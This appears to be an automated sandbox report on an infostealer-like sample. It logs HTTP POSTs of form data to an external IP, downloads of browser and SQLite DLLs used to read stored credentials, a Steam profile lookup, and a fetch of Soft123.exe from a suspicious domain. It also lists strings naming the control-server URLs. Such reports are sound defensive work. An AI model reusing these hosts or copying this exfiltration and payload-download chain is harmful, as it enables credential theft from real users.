Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KKJKFBKKECFHJKEBKEHIUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 65.109.242.73Content-Length: 4677Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----EHJDGCBGDBKJKFHIECBAUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 65.109.242.73Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----EBFBKFBGIIIDGDGCFCGIUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 65.109.242.73Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 65.109.242.73Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 65.109.242.73Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 65.109.242.73Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 65.109.242.73Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 65.109.242.73Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 65.109.242.73Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AAFBAKECAEGCBFIEGDGIUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 65.109.242.73Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----EBGCFBGCBFHJECBGDAKKUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 65.109.242.73Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /Soft123.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: centrosmissextensions.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CBKJJEHCBAKFBFHJKFBKUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 65.109.242.73Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KEHJKJDGCGDAKFHIDBGCUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 65.109.242.73Content-Length: 453Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KKKJEHCGCGDAAAKFHJKJUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 65.109.242.73Content-Length: 331Connection: Keep-AliveCache-Control: no-cache

Source: unknown	TCP traffic detected without corresponding DNS query: 65.109.242.73
Source: unknown	TCP traffic detected without corresponding DNS query: 65.109.242.73
Source: unknown	TCP traffic detected without corresponding DNS query: 65.109.242.73
Source: unknown	TCP traffic detected without corresponding DNS query: 65.109.242.73
Source: unknown	TCP traffic detected without corresponding DNS query: 65.109.242.73
Source: unknown	TCP traffic detected without corresponding DNS query: 65.109.242.73
Source: unknown	TCP traffic detected without corresponding DNS query: 65.109.242.73
Source: unknown	TCP traffic detected without corresponding DNS query: 65.109.242.73
Source: unknown	TCP traffic detected without corresponding DNS query: 65.109.242.73
Source: unknown	TCP traffic detected without corresponding DNS query: 65.109.242.73
Source: unknown	TCP traffic detected without corresponding DNS query: 65.109.242.73
Source: unknown	TCP traffic detected without corresponding DNS query: 65.109.242.73
Source: unknown	TCP traffic detected without corresponding DNS query: 65.109.242.73
Source: unknown	TCP traffic detected without corresponding DNS query: 65.109.242.73
Source: unknown	TCP traffic detected without corresponding DNS query: 65.109.242.73
Source: unknown	TCP traffic detected without corresponding DNS query: 65.109.242.73
Source: unknown	TCP traffic detected without corresponding DNS query: 65.109.242.73
Source: unknown	TCP traffic detected without corresponding DNS query: 65.109.242.73
Source: unknown	TCP traffic detected without corresponding DNS query: 65.109.242.73
Source: unknown	TCP traffic detected without corresponding DNS query: 65.109.242.73
Source: unknown	TCP traffic detected without corresponding DNS query: 65.109.242.73
Source: unknown	TCP traffic detected without corresponding DNS query: 65.109.242.73
Source: unknown	TCP traffic detected without corresponding DNS query: 65.109.242.73
Source: unknown	TCP traffic detected without corresponding DNS query: 65.109.242.73
Source: unknown	TCP traffic detected without corresponding DNS query: 65.109.242.73
Source: unknown	TCP traffic detected without corresponding DNS query: 65.109.242.73
Source: unknown	TCP traffic detected without corresponding DNS query: 65.109.242.73
Source: unknown	TCP traffic detected without corresponding DNS query: 65.109.242.73
Source: unknown	TCP traffic detected without corresponding DNS query: 65.109.242.73
Source: unknown	TCP traffic detected without corresponding DNS query: 65.109.242.73
Source: unknown	TCP traffic detected without corresponding DNS query: 65.109.242.73
Source: unknown	TCP traffic detected without corresponding DNS query: 65.109.242.73
Source: unknown	TCP traffic detected without corresponding DNS query: 65.109.242.73
Source: unknown	TCP traffic detected without corresponding DNS query: 65.109.242.73
Source: unknown	TCP traffic detected without corresponding DNS query: 65.109.242.73
Source: unknown	TCP traffic detected without corresponding DNS query: 65.109.242.73
Source: unknown	TCP traffic detected without corresponding DNS query: 65.109.242.73
Source: unknown	TCP traffic detected without corresponding DNS query: 65.109.242.73
Source: unknown	TCP traffic detected without corresponding DNS query: 65.109.242.73
Source: unknown	TCP traffic detected without corresponding DNS query: 65.109.242.73
Source: unknown	TCP traffic detected without corresponding DNS query: 65.109.242.73
Source: unknown	TCP traffic detected without corresponding DNS query: 65.109.242.73
Source: unknown	TCP traffic detected without corresponding DNS query: 65.109.242.73
Source: unknown	TCP traffic detected without corresponding DNS query: 65.109.242.73
Source: unknown	TCP traffic detected without corresponding DNS query: 65.109.242.73
Source: unknown	TCP traffic detected without corresponding DNS query: 65.109.242.73
Source: unknown	TCP traffic detected without corresponding DNS query: 65.109.242.73
Source: unknown	TCP traffic detected without corresponding DNS query: 65.109.242.73
Source: unknown	TCP traffic detected without corresponding DNS query: 65.109.242.73
Source: unknown	TCP traffic detected without corresponding DNS query: 65.109.242.73

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

3_2_00404500

Source: global traffic	HTTP traffic detected: GET /profiles/76561199673019888 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 65.109.242.73Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sqln.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 65.109.242.73Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 65.109.242.73Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 65.109.242.73Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 65.109.242.73Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 65.109.242.73Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 65.109.242.73Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 65.109.242.73Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /Soft123.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: centrosmissextensions.comCache-Control: no-cache

Source: unknown

DNS traffic detected: queries for: steamcommunity.com

Source: unknown

Source: CAFIJKFHIJ.exe, 00000009.00000002.2065130719.0000000004451000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://185.209.162.40/
Source: CAFIJKFHIJ.exe, 00000009.00000002.2065130719.0000000004451000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://185.209.162.40/apocalypseRussia
Source: CAFIJKFHIJ.exe, 00000009.00000002.2065130719.0000000004451000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://5.42.65.32/
Source: CAFIJKFHIJ.exe, 00000009.00000002.2065130719.0000000004451000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://5.42.65.32/CHECK.php
Source: CAFIJKFHIJ.exe, 00000009.00000002.2065130719.0000000004451000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://5.42.65.32/EOK.php
Source: CAFIJKFHIJ.exe, 00000009.00000002.2065130719.0000000004451000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://5.42.65.32/SOSORRY.php
Source: CAFIJKFHIJ.exe, 00000009.00000002.2065130719.0000000004451000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://5.42.65.32/TOKYO.php
Source: CAFIJKFHIJ.exe, 00000009.00000000.1988827783.0000000000D02000.00000002.00000001.01000000.00000009.sdmp, nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr, CAFIJKFHIJ.exe.3.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: CAFIJKFHIJ.exe, 00000009.00000000.1988827783.0000000000D02000.00000002.00000001.01000000.00000009.sdmp, CAFIJKFHIJ.exe.3.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertEVCodeSigningCA-SHA2.crt0
Source: CAFIJKFHIJ.exe, 00000009.00000000.1988827783.0000000000D02000.00000002.00000001.01000000.00000009.sdmp, CAFIJKFHIJ.exe.3.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
Source: nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: CAFIJKFHIJ.exe, 00000009.00000000.1988827783.0000000000D02000.00000002.00000001.01000000.00000009.sdmp, CAFIJKFHIJ.exe.3.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: CAFIJKFHIJ.exe, 00000009.00000000.1988827783.0000000000D02000.00000002.00000001.01000000.00000009.sdmp, CAFIJKFHIJ.exe.3.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: CAFIJKFHIJ.exe, 00000009.00000000.1988827783.0000000000D02000.00000002.00000001.01000000.00000009.sdmp, CAFIJKFHIJ.exe.3.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: CAFIJKFHIJ.exe, 00000009.00000000.1988827783.0000000000D02000.00000002.00000001.01000000.00000009.sdmp, CAFIJKFHIJ.exe.3.dr	String found in binary or memory: http://crl3.digicert.com/EVCodeSigningSHA2-g1.crl07
Source: nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: CAFIJKFHIJ.exe, 00000009.00000000.1988827783.0000000000D02000.00000002.00000001.01000000.00000009.sdmp, CAFIJKFHIJ.exe.3.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: CAFIJKFHIJ.exe, 00000009.00000000.1988827783.0000000000D02000.00000002.00000001.01000000.00000009.sdmp, nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr, CAFIJKFHIJ.exe.3.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
Source: CAFIJKFHIJ.exe, 00000009.00000000.1988827783.0000000000D02000.00000002.00000001.01000000.00000009.sdmp, CAFIJKFHIJ.exe.3.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: CAFIJKFHIJ.exe, 00000009.00000000.1988827783.0000000000D02000.00000002.00000001.01000000.00000009.sdmp, CAFIJKFHIJ.exe.3.dr	String found in binary or memory: http://crl4.digicert.com/EVCodeSigningSHA2-g1.crl0K
Source: nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: CAFIJKFHIJ.exe, 00000009.00000000.1988827783.0000000000D02000.00000002.00000001.01000000.00000009.sdmp, CAFIJKFHIJ.exe.3.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: CAFIJKFHIJ.exe.3.dr	String found in binary or memory: http://fontawesome.iohttp://fontawesome.io/license/
Source: CAFIJKFHIJ.exe, 00000009.00000000.1988827783.0000000000D02000.00000002.00000001.01000000.00000009.sdmp, CAFIJKFHIJ.exe.3.dr	String found in binary or memory: http://fontawesome.iohttp://fontawesome.io/license/Copyright
Source: nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: CAFIJKFHIJ.exe, 00000009.00000000.1988827783.0000000000D02000.00000002.00000001.01000000.00000009.sdmp, nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr, CAFIJKFHIJ.exe.3.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: CAFIJKFHIJ.exe, 00000009.00000000.1988827783.0000000000D02000.00000002.00000001.01000000.00000009.sdmp, CAFIJKFHIJ.exe.3.dr	String found in binary or memory: http://ocsp.digicert.com0H
Source: CAFIJKFHIJ.exe, 00000009.00000000.1988827783.0000000000D02000.00000002.00000001.01000000.00000009.sdmp, CAFIJKFHIJ.exe.3.dr	String found in binary or memory: http://ocsp.digicert.com0I
Source: nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://ocsp.digicert.com0N
Source: CAFIJKFHIJ.exe, 00000009.00000000.1988827783.0000000000D02000.00000002.00000001.01000000.00000009.sdmp, CAFIJKFHIJ.exe.3.dr	String found in binary or memory: http://ocsp.digicert.com0O
Source: nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: CAFIJKFHIJ.exe, 00000009.00000000.1988827783.0000000000D02000.00000002.00000001.01000000.00000009.sdmp, CAFIJKFHIJ.exe.3.dr	String found in binary or memory: http://schemas.fontawesome.io/icons/
Source: RegAsm.exe, 00000003.00000002.2042222099.0000000001654000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.3.dr	String found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
Source: RegAsm.exe, 00000003.00000002.2042222099.0000000001654000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.3.dr	String found in binary or memory: http://store.steampowered.com/privacy_agreement/
Source: RegAsm.exe, 00000003.00000002.2042222099.0000000001654000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.3.dr	String found in binary or memory: http://store.steampowered.com/subscriber_agreement/
Source: CAFIJKFHIJ.exe, 00000009.00000000.1988827783.0000000000D02000.00000002.00000001.01000000.00000009.sdmp, nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr, CAFIJKFHIJ.exe.3.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: CAFIJKFHIJ.exe, 00000009.00000000.1988827783.0000000000D02000.00000002.00000001.01000000.00000009.sdmp, CAFIJKFHIJ.exe.3.dr	String found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
Source: CAFIJKFHIJ.exe, 00000009.00000000.1988827783.0000000000D02000.00000002.00000001.01000000.00000009.sdmp, CAFIJKFHIJ.exe.3.dr	String found in binary or memory: http://www.freedesktop.org/standards/dbus/1.0/introspect.dtd
Source: RegAsm.exe, RegAsm.exe, 00000003.00000002.2050716572.000000006C86D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.3.dr, mozglue.dll.3.dr	String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: RegAsm.exe, 00000003.00000002.2047018875.000000001C3AD000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2043322423.0000000016408000.00000004.00000020.00020000.00000000.sdmp, sqln[1].dll.3.dr	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: RegAsm.exe, 00000003.00000002.2042222099.0000000001654000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039734186.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.3.dr	String found in binary or memory: http://www.valvesoftware.com/legal.htm
Source: 76561199673019888[1].htm.3.dr	String found in binary or memory: https://65.109.242.73
Source: RegAsm.exe, 00000003.00000002.2042222099.0000000001654000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://65.109.242.73/
Source: RegAsm.exe, 00000003.00000002.2042222099.0000000001654000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://65.109.242.73/freebl3.dll
Source: RegAsm.exe, 00000003.00000002.2042222099.0000000001654000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://65.109.242.73/mozglue.dll
Source: RegAsm.exe, 00000003.00000002.2042222099.0000000001654000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://65.109.242.73/msvcp140.dll
Source: RegAsm.exe, 00000003.00000002.2042222099.0000000001654000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://65.109.242.73/msvcp140.dllKD
Source: RegAsm.exe, 00000003.00000002.2042222099.000000000167F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://65.109.242.73/nss3.dll
Source: RegAsm.exe, 00000003.00000002.2042222099.0000000001654000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://65.109.242.73/softokn3.dll
Source: RegAsm.exe, 00000003.00000002.2039734186.0000000000514000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://65.109.242.73/sqln.dll
Source: RegAsm.exe, 00000003.00000002.2042222099.0000000001654000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://65.109.242.73/vcruntime140.dll
Source: RegAsm.exe, 00000003.00000002.2042222099.0000000001654000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://65.109.242.73/vcruntime140.dllfH
Source: RegAsm.exe, 00000003.00000002.2042222099.0000000001654000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://65.109.242.73/x5
Source: RegAsm.exe, 00000003.00000002.2039734186.00000000005F1000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://65.109.242.730d7bece6afnt-Disposition:
Source: RegAsm.exe, 00000003.00000002.2039734186.0000000000558000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://65.109.242.73BGDAKK--
Source: RegAsm.exe, 00000003.00000002.2039734186.0000000000558000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://65.109.242.73BGDAKKg
Source: RegAsm.exe, 00000003.00000002.2039734186.00000000005F1000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://65.109.242.73DAKK
Source: RegAsm.exe, 00000003.00000002.2039734186.0000000000434000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://65.109.242.73DBGC
Source: RegAsm.exe, 00000003.00000002.2039734186.00000000005F1000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://65.109.242.73T
Source: RegAsm.exe, 00000003.00000002.2039734186.0000000000558000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://65.109.242.73t/form-data;
Source: BKEBFHIJ.3.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: 76561199673019888[1].htm.3.dr	String found in binary or memory: https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
Source: BKEBFHIJ.3.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: RegAsm.exe, 00000003.00000002.2042222099.0000000001654000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://centrosmissextensions.com/
Source: RegAsm.exe, 00000003.00000002.2042222099.000000000162B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2042222099.000000000167F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://centrosmissextensions.com/Soft123.exe
Source: BKEBFHIJ.3.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: BKEBFHIJ.3.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: RegAsm.exe, 00000003.00000002.2039734186.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=96N66CvLHly8&a
Source: RegAsm.exe, 00000003.00000002.2042222099.0000000001654000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039734186.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english
Source: RegAsm.exe, 00000003.00000002.2042222099.0000000001654000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039734186.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp
Source: RegAsm.exe, 00000003.00000002.2042222099.0000000001654000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039734186.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english
Source: RegAsm.exe, 00000003.00000002.2042222099.0000000001654000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039734186.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.TP5s6TzX6LLh
Source: RegAsm.exe, 00000003.00000002.2042222099.0000000001654000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039734186.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis
Source: RegAsm.exe, 00000003.00000002.2039734186.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
Source: RegAsm.exe, 00000003.00000002.2039734186.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
